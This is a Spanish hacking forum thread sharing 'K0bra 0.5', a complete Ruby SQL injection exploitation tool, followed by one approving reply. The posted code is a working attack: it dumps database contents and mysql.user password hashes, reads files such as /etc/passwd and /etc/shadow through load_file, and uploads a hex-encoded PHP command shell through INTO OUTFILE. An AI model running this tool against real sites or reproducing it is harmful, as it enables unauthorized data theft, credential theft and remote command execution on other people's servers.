comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Ruby] K0bra 0.5

  • 1 Respuestas
  • 1647 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Julio 24, 2015, 01:12:31 pm »
Version mejorada de este script en Ruby para scannear la vulnerablidad SQLI en una pagina.

El script tiene las siguientes opciones :

  • Comprobar vulnerabilidad
  • Buscar numero de columnas
  • Buscar automaticamente el numero para mostrar datos
  • Mostras tablas
  • Mostrar columnas
  • Mostrar bases de datos
  • Mostrar tablas de otra DB
  • Mostrar columnas de una tabla de otra DB
  • Mostrar usuarios de mysql.user
  • Buscar archivos usando load_file
  • Mostrar un archivo usando load_file
  • Mostrar valores
  • Mostrar informacion sobre la DB
  • Crear una shell usando outfile
  • Todo se guarda en logs ordenados


El codigo :

Código: Ruby
  1. #!usr/bin/ruby
  2. #K0bra 0.5
  3. #(C) Doddy Hackman 2015
  4.  
  5. require "net/http"
  6. require "open-uri"
  7.  
  8. $files = ['C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog']
  9.  
  10. def toma(web)
  11.   begin
  12.     return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  13.   rescue
  14.     return "Error"
  15.   end
  16. end
  17.  
  18. def decode_hex(text)
  19.   text = text.sub("0x","")
  20.   return [text].pack('H*')[0]
  21. end
  22.  
  23. def encode_hex(text)
  24.   return "0x"+text.unpack('H*')[0]
  25. end
  26.  
  27. def copyright()
  28.   print "\n-- == (C) Doddy Hackman 2015 == --\n"
  29.   gets.chomp
  30.   exit(1)
  31. end
  32.  
  33. def installer()
  34.   dir = Dir::pwd+"/"+"logs_webs"
  35.   if not FileTest::directory?(dir)
  36.     Dir::mkdir(dir)
  37.   end
  38. end
  39.  
  40. def savefile(file,text)
  41.   url = URI.parse(file)
  42.   save = File.open("logs_webs/"+url.host+".txt","a")
  43.   save.puts text+"\n"
  44.   save.close
  45. end
  46.  
  47. def bypass(op)
  48.   if op=="--"
  49.     return "+","--"
  50.   elsif op=="/*"
  51.    return "/**/","/**/"
  52.   elsif op=="%20"
  53.    return "%20","%00"
  54.   else
  55.    return "+","--"    
  56.   end
  57. end
  58.  
  59. def head()
  60.   clean()
  61.   print "
  62.  
  63. @      @@   @            
  64. @@     @  @ @@            
  65. @ @@  @  @  @ @   @ @ @@@
  66. @ @   @  @  @@ @ @@@ @  @
  67. @@    @  @  @  @  @   @@@
  68. @ @   @  @  @  @  @  @  @
  69. @@@ @   @@   @@@  @@@ @@@@@
  70.  
  71. "
  72. end
  73.  
  74. def volverinicio()
  75.   print "\n\n[+] Press any key to continue\n\n"
  76.   gets.chomp
  77.   inicio()
  78. end
  79.  
  80. def clean()
  81.   if RUBY_PLATFORM=~/win/ or RUBY_PLATFORM=~/min/
  82.     system("cls")
  83.   else
  84.     system("clear")
  85.   end
  86. end
  87.  
  88. def retorno(url,by)
  89.   print "\n[+] Finished"
  90.   print "\n\n[+] Press any key to continue\n\n"
  91.   gets.chomp
  92.   central(url,by)
  93. end
  94.  
  95. def gettables(url,by)
  96.   pass1,pass2 = bypass(by)
  97.   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))")
  98.   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
  99.   print "\n[+] Getting tables ...\n\n"
  100.   code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  101.   if code1=~/K0BRA(.*?)K0BRA/
  102.     total = $1
  103.     print "[+] Tables Found : ",total,"\n\n"
  104.     savefile(url,"\n[+] Tables Found : #{total}\n")
  105.     for num in ("17"..total)
  106.       code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+num+",1"+pass2)
  107.       if code2=~/K0BRA(.*?)K0BRA/
  108.         table = $1
  109.         print "[+] Table Found : "+table+"\n"
  110.         savefile(url,"[+] Table Found : #{table}")
  111.       end
  112.     end
  113.   else
  114.     print "[-] Not Found\n"
  115.   end
  116. end
  117.  
  118. def getcolumns(url,by,tablex)
  119.   tablexa = encode_hex(tablex)
  120.   pass1,pass2 = bypass(by)
  121.   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))")
  122.   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
  123.   print "\n[+] Getting columns ...\n\n"
  124.   code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass2)
  125.   if code1=~/K0BRA(.*?)K0BRA/
  126.     total = $1
  127.     print "[+] Columns Found : ",total,"\n\n"
  128.     savefile(url,"\n[+] Table : #{tablex}")
  129.     savefile(url,"[+] Columns Found : #{total}\n")
  130.     for num in ("0"..total)
  131.       code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass1+"limit"+pass1+num+",1"+pass2)
  132.       if code2=~/K0BRA(.*?)K0BRA/
  133.         table = $1
  134.         print "[+] Column Found : "+table+"\n"
  135.         savefile(url,"[+] Column Found : #{table}")
  136.       end
  137.     end
  138.   else
  139.     print "[-] Not Found\n"
  140.   end
  141. end
  142.  
  143. def getdbs(url,by)
  144.   pass1,pass2 = bypass(by)
  145.   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  146.   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))")
  147.   print "\n[+] Getting DBS ...\n\n"
  148.   code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
  149.   if code1=~/K0BRA(.*?)K0BRA/
  150.     total = $1
  151.     print "[+] DBS Found : ",total,"\n\n"
  152.     savefile(url,"\n[+] DBS Found : #{total}\n")
  153.     for num in ("0"..total)
  154.       code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+num+",1"+pass2)
  155.       if code2=~/K0BRA(.*?)K0BRA/
  156.         table = $1
  157.         print "[+] DB Found : "+table+"\n"
  158.         savefile(url,"[+] DB Found : #{table}")
  159.       end
  160.     end
  161.   else
  162.     print "[-] Not Found\n"
  163.   end
  164. end
  165.  
  166. def gettablesbydb(url,by,dbx)
  167.   data  = encode_hex(dbx)
  168.   pass1,pass2 = bypass(by)
  169.   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  170.   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
  171.   print "\n[+] Getting tables ...\n\n"
  172.   code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass2)
  173.   if code1=~/K0BRA(.*?)K0BRA/
  174.     total = $1
  175.     print "[+] Tables Found : ",total,"\n\n"
  176.     savefile(url,"\n[+] DBS : #{dbx}")
  177.     savefile(url,"[+] Tables Found : #{total}\n")
  178.     for num in ("0"..total)
  179.       code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
  180.       if code2=~/K0BRA(.*?)K0BRA/
  181.         table = $1
  182.         print "[+] Table Found : "+table+"\n"
  183.         savefile(url,"[+] Table Found : #{table}")
  184.       end
  185.     end
  186.   else
  187.     print "[-] Not Found\n"
  188.   end
  189. end
  190.  
  191. def getcolumnsbydb(url,by,db,tab)
  192.   data = encode_hex(db)
  193.   tabx = encode_hex(tab)
  194.  
  195.   pass1,pass2 = bypass(by)
  196.   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  197.   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
  198.   print "\n[+] Getting columns ...\n\n"
  199.   code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass2)
  200.   if code1=~/K0BRA(.*?)K0BRA/
  201.     total = $1
  202.     print "[+] Columns Found : ",total,"\n\n"
  203.     savefile(url,"\n[+] DB : #{db}")
  204.     savefile(url,"[+] Table : #{tab}")
  205.     savefile(url,"[+] Columns Found : #{total}\n")
  206.     for num in ("0"..total)
  207.       code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
  208.       if code2=~/K0BRA(.*?)K0BRA/
  209.         table = $1
  210.         print "[+] Column Found : "+table+"\n"
  211.         savefile(url,"[+] Column Found : #{table}")
  212.       end
  213.     end
  214.   else
  215.     print "[-] Not Found\n"
  216.   end
  217. end
  218.  
  219. def mysqluser(url,by)
  220.   pass1,pass2 = bypass(by)
  221.   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  222.   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))")
  223.    print "\n[+] Searching mysql.user\n\n"
  224.   code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  225.   if code1=~/K0BRA(.*?)K0BRA/
  226.     total = $1
  227.     print "[+] Users Mysql Found : ",total,"\n\n"
  228.     savefile(url,"[+] Users Mysql Found : "+total+"\n")
  229.     for num in ("0"..total)
  230.       code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+num+",1"+pass2)
  231.       if code2=~/K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2/
  232.         host,user,passw = $1,$2,$3
  233.         print "[Host] : "+host
  234.         print " [User] : "+user
  235.         print " [Pass] : "+passw+"\n"  
  236.         savefile(url,"[Host] : "+host)
  237.         savefile(url,"[User] : "+user)
  238.         savefile(url,"[Pass] : "+passw+"\n")
  239.       end
  240.     end
  241.   else
  242.     print "[-] Not Found\n"
  243.   end
  244. end
  245.  
  246. def details(url,by)
  247.   pass1,pass2 = bypass(by)
  248.   hextest = "0x2f6574632f706173737764" #/etc/passwd
  249.   hextest = "0x633A2F78616D70702F726561642E747874" #c:/xampp/read.txt
  250.   web1 = url.sub(/hackman/,"0x4b30425241")
  251.   web2 = url.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
  252.   web3 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))")
  253.    print "\n[+] Extrating information of the DB\n"
  254.   code1 = toma(web2)
  255.   if code1=~/K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA/
  256.     user,data,ver = $1,$2,$3
  257.     print "\n[+] Username : "+user
  258.     print "\n[+] Database : "+data
  259.     print "\n[+] Version : "+ver+"\n\n"
  260.     savefile(url,"\n[+] Username : "+user)
  261.     savefile(url,"[+] Database : "+data)
  262.     savefile(url,"[+] Version : "+ver+"\n")
  263.   else
  264.     print "[-] Not Found\n"
  265.   end
  266.    code2 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  267.    code3 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  268.    code4 = toma(web3)
  269.    if code2=~/K0BRA/
  270.      print "[+] Mysql User : ON\n"
  271.      savefile(url,"[+] Mysqluser : ON")
  272.    end
  273.    if code3=~/K0BRA/
  274.      print "[+] information_schema : ON\n"
  275.      savefile(url,"[+] information_schema : ON")
  276.    end
  277.    if code4=~/ERTOR854/
  278.      print "[+] load_file : ON\n"
  279.      savefile(url,"[+] load_file : ON")
  280.    end  
  281.    savefile(url,"") #espacio en blanco
  282.  end
  283.  
  284.  def dumper(url,by,table,col1,col2)
  285.   pass1,pass2 = bypass(by)
  286.   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  287.   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,"+col2+",0x4b30425241)))")
  288.   print "\n[+] Getting Values ...\n\n"
  289.   code1 = toma(web1+pass1+"from"+pass1+table+pass2)
  290.   if code1=~/K0BRA(.*?)K0BRA/
  291.     total = $1
  292.     savefile(url,"\n[+] Table : "+table)
  293.     savefile(url,"[+] Column 1 : "+col1)
  294.     savefile(url,"[+] Column 2 : "+col2)
  295.     print "[+] Values Found : ",total,"\n"
  296.     savefile(url,"\n[+] Values Found : #{total}\n")
  297.     for num in ("0"..total)
  298.       code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+num+",1"+pass2)
  299.       if code2=~/K0BRA(.*)K0BRA(.*)K0BRA/
  300.         uno,dos = $1,$2
  301.         print "\n[+] "+col1+" : "+uno+"\n"
  302.         print "[+] "+col2+" : "+dos+"\n"
  303.         savefile(url,"\n[+] "+col1+" : "+uno)
  304.         savefile(url,"[+] "+col2+" : "+dos)
  305.       end
  306.     end
  307.   else
  308.     print "[-] Not Found\n"
  309.   end
  310. end
  311.  
  312. def fuzzfile(url,by)
  313.   pass1,pass2 = bypass(by)
  314.   print "\n[+] Fuzzing Files with load_file ....\n"
  315.   $files.each do |file|
  316.     res = file
  317.     file = file.chomp
  318.     file = encode_hex(file)
  319.     web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
  320.     code = toma(web1)
  321.     if code=~/ERTOR854(.*?)ERTOR854/m
  322.       print "\n\n[File Found] : ",res
  323.       print "\n\n[Source Start]\n"
  324.       print $1
  325.       print "\n[Source End]"
  326.       savefile(url,"\n[File Found] : "+res)
  327.       savefile(url,"\n[Source Start]\n")
  328.       savefile(url,$1)
  329.       savefile(url,"\n[Source End]")
  330.     end    
  331.   end
  332.   print "\n"
  333. end
  334.  
  335. def abrirfile(url,by,file)
  336.   pass1,pass2 = bypass(by)
  337.   print "\n[+] Opening file ....\n"
  338.   res = file
  339.   file = encode_hex(file)
  340.     web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
  341.     code = toma(web1)
  342.     if code=~/ERTOR854(.*?)ERTOR854/m
  343.       print "\n\n[File Found] : ",res
  344.       print "\n\n[Source Start]\n"
  345.       print $1
  346.       print "\n[Source End]\n"
  347.       savefile(url,"\n[File Found] : "+res)
  348.       savefile(url,"\n[Source Start]\n")
  349.       savefile(url,$1)
  350.       savefile(url,"\n[Source End]\n")
  351.     else
  352.       print "\n\n[-] Error\n\n"
  353.     end
  354.        
  355. end
  356.  
  357. def into(url,by,full,dir)
  358.   pass1,pass2 = bypass(by)
  359.   linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
  360.   lugar = full+"/cmd.php"
  361.   lugardos = dir+"/cmd.php"
  362.   h = URI.parse(url)
  363.   webtest = "http://"+h.host+lugardos
  364.   web1 = url.sub(/hackman/,linea)
  365.   formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2
  366.   toma(formandoweb)
  367.   code = toma(webtest)
  368.   if code=~/Mini Shell By Doddy/
  369.     print "\n[Shell Up] : "+webtest+"\n"
  370.     savefile(url,"\n[Shell Up] : "+webtest+"\n")
  371.   else
  372.     print "\n\n[-] Error\n"
  373.   end
  374. end
  375.  
  376. def central(url,by)
  377.   clean()
  378.   head()
  379.   print "\n\n[+] Page : #{url}\n"
  380.   print "[+] ByPass : #{by}\n\n"
  381.  
  382.   print "\n[information_schema]\n\n"
  383.   print "1 - Show tables\n"
  384.   print "2 - Show columns of the a table\n"
  385.   print "3 - Show databases\n"
  386.   print "4 - Show tables from the a DB\n"
  387.   print "5 - Show columns from the a table of the DB\n"
  388.   print "\n[mysql.user]\n\n"
  389.   print "6 - Show users\n"
  390.   print "\n[Others]\n\n"
  391.   print "7 - Show details\n"
  392.   print "8 - Dump data\n"
  393.   print "9 - Fuzz Files with load_file\n"
  394.   print "10 - Load files with load_file\n"
  395.   print "11 - Create Shell\n"
  396.   print "12 - Show log\n"
  397.   print "13 - Change target\n"
  398.   print "14 - Exit\n\n\n"
  399.  
  400.   print "[+] Option : "
  401.   op = gets.chomp
  402.   print "\n"
  403.    
  404.   if op == "1"
  405.     gettables(url,by)
  406.     retorno(url,by)
  407.   elsif op == "2"
  408.     print "\n[+] Table : "
  409.     table = gets.chomp
  410.     getcolumns(url,by,table)
  411.     retorno(url,by)
  412.   elsif op == "3"
  413.     getdbs(url,by)
  414.     retorno(url,by)
  415.   elsif op == "4"
  416.     print "\n[+] DB : "
  417.     db = gets.chomp
  418.     gettablesbydb(url,by,db)
  419.     retorno(url,by)
  420.   elsif op == "5"
  421.     print "\n[+] DB : "
  422.     db = gets.chomp
  423.     print "\n[+] Table : "
  424.     tab = gets.chomp
  425.     getcolumnsbydb(url,by,db,tab)
  426.     retorno(url,by)
  427.   elsif op == "6"
  428.     mysqluser(url,by)
  429.     retorno(url,by)
  430.   elsif op == "7"
  431.     details(url,by)
  432.     retorno(url,by)
  433.   elsif op == "8"
  434.     print "\n[+] Table : "
  435.     table = gets.chomp
  436.     print "\n[+] Column 1 : "
  437.     col1 = gets.chomp
  438.     print "\n[+] Column 2 : "
  439.     col2 = gets.chomp
  440.     dumper(url,by,table,col1,col2)
  441.     retorno(url,by)
  442.   elsif op == "9"
  443.     fuzzfile(url,by)
  444.     retorno(url,by)
  445.   elsif op == "10"
  446.     print "\n[+] File : "
  447.     file = gets.chomp
  448.     abrirfile(url,by,file)
  449.     retorno(url,by)
  450.   elsif op == "11"
  451.     print "\n[Full Source Discloure] : "
  452.     full = gets.chomp
  453.     print "\n[Directory to test] : "
  454.     dir = gets.chomp
  455.     into(url,by,full,dir)
  456.     retorno(url,by)
  457.   elsif op == "12"
  458.     urla = URI.parse(url)
  459.     ar = "logs_webs/"+urla.host+".txt"
  460.     system("start #{ar}")
  461.     retorno(url,by)
  462.   elsif op == "13"
  463.     inicio()
  464.   elsif op == "14"
  465.     copyright()
  466.   else
  467.     retorno(url,by)
  468.   end
  469. end
  470.  
  471. def findlength(url,by)
  472.   pass1,pass2 = bypass(by)
  473.   z = "1"
  474.   print "\n[+] Finding columns lenght ...\n\n"
  475.   x = "concat(0x4b30425241,1,0x4b30425241)"
  476.   for num in ('2'..'25')
  477.     z = z+","+num
  478.     x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
  479.     code = toma(url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+x)
  480.     if code=~/K0BRA(.*?)K0BRA/
  481.       print "[+] The Page has "+num+" columns\n"
  482.       print "[+] The number "+$1+" print data"
  483.       z = z.sub($1,"hackman")
  484.       sqli = url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+z
  485.       savefile(url,"[+] SQLI : "+sqli)
  486.       savefile(url,"[+] Bypass : "+by+"\n")
  487.       central(sqli,by)
  488.     end
  489.   end
  490.   print "[-] Columns lenght not found\n"
  491.   volverinicio()
  492. end
  493.  
  494. def testvul(page,by)
  495.   pass1,pass2 = bypass(by)
  496.   print "\n\n[+] Testing vulnerability ...\n\n"
  497.   codeuno = toma(page+"1"+pass1+"and"+pass1+"1=0"+pass2)
  498.   codedos = toma(page+"1"+pass1+"and"+pass1+"1=1"+pass2)
  499.   if codeuno != codedos
  500.     print "[+] Vulnerable !\n"
  501.     findlength(page,by)
  502.   else
  503.     print "[-] Not vulnerable\n"
  504.     print "\n[+] Scan anyway y/n : "
  505.     op = gets.chomp
  506.     if op == "y"
  507.       findlength(page,by)
  508.     else
  509.       volverinicio()
  510.   end
  511.  end  
  512. end
  513.  
  514. def inicio()
  515.   clean()
  516.   head()
  517.   print "\n\n[+] Page : "
  518.   page = gets.chomp
  519.   print "\n[+] Bypass : "
  520.   by = gets.chomp
  521.   if page=~/hackman/
  522.     central(page,by)
  523.   else
  524.     testvul(page,by)
  525.   end
  526. end
  527.  
  528. installer()
  529. inicio()
  530.  
  531. # The End ?
  532.  

Eso es todo.

Conectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1893
  • Actividad:
    16.67%
  • Reputación 14
    • Ver Perfil
« Respuesta #1 en: Julio 26, 2015, 07:15:11 am »
Que genial aporte, muy buena @You are not allowed to view links. Register or Login, luego la pruebo :D

Saludos.



 

¿Te gustó el post? COMPARTILO!



[Ruby] Traductor de Decimal a Ascii / Ascii a Decimal

Iniciado por ANTRAX

Respuestas: 0
Vistas: 1400
Último mensaje Febrero 24, 2010, 04:16:38 pm
por ANTRAX
Lenguaje Ruby, aprendiendo poco a poco.

Iniciado por Alejandro9999

Respuestas: 2
Vistas: 1372
Último mensaje Agosto 15, 2013, 02:58:39 pm
por Alejandro9999
Crafting rails 4 applications (Manual de Ruby on Rails 4)

Iniciado por Alejandro9999

Respuestas: 0
Vistas: 864
Último mensaje Marzo 01, 2014, 05:34:50 pm
por Alejandro9999
Desarrollo de aplicaciones Perl, PHP, Python y "Ruby on Rails"

Iniciado por Alejandro9999

Respuestas: 0
Vistas: 1096
Último mensaje Junio 13, 2014, 03:27:08 pm
por Alejandro9999
Como Instalar RubyMine y Crear un proyecto vacio para Ruby y Rails

Iniciado por Alejandro9999

Respuestas: 0
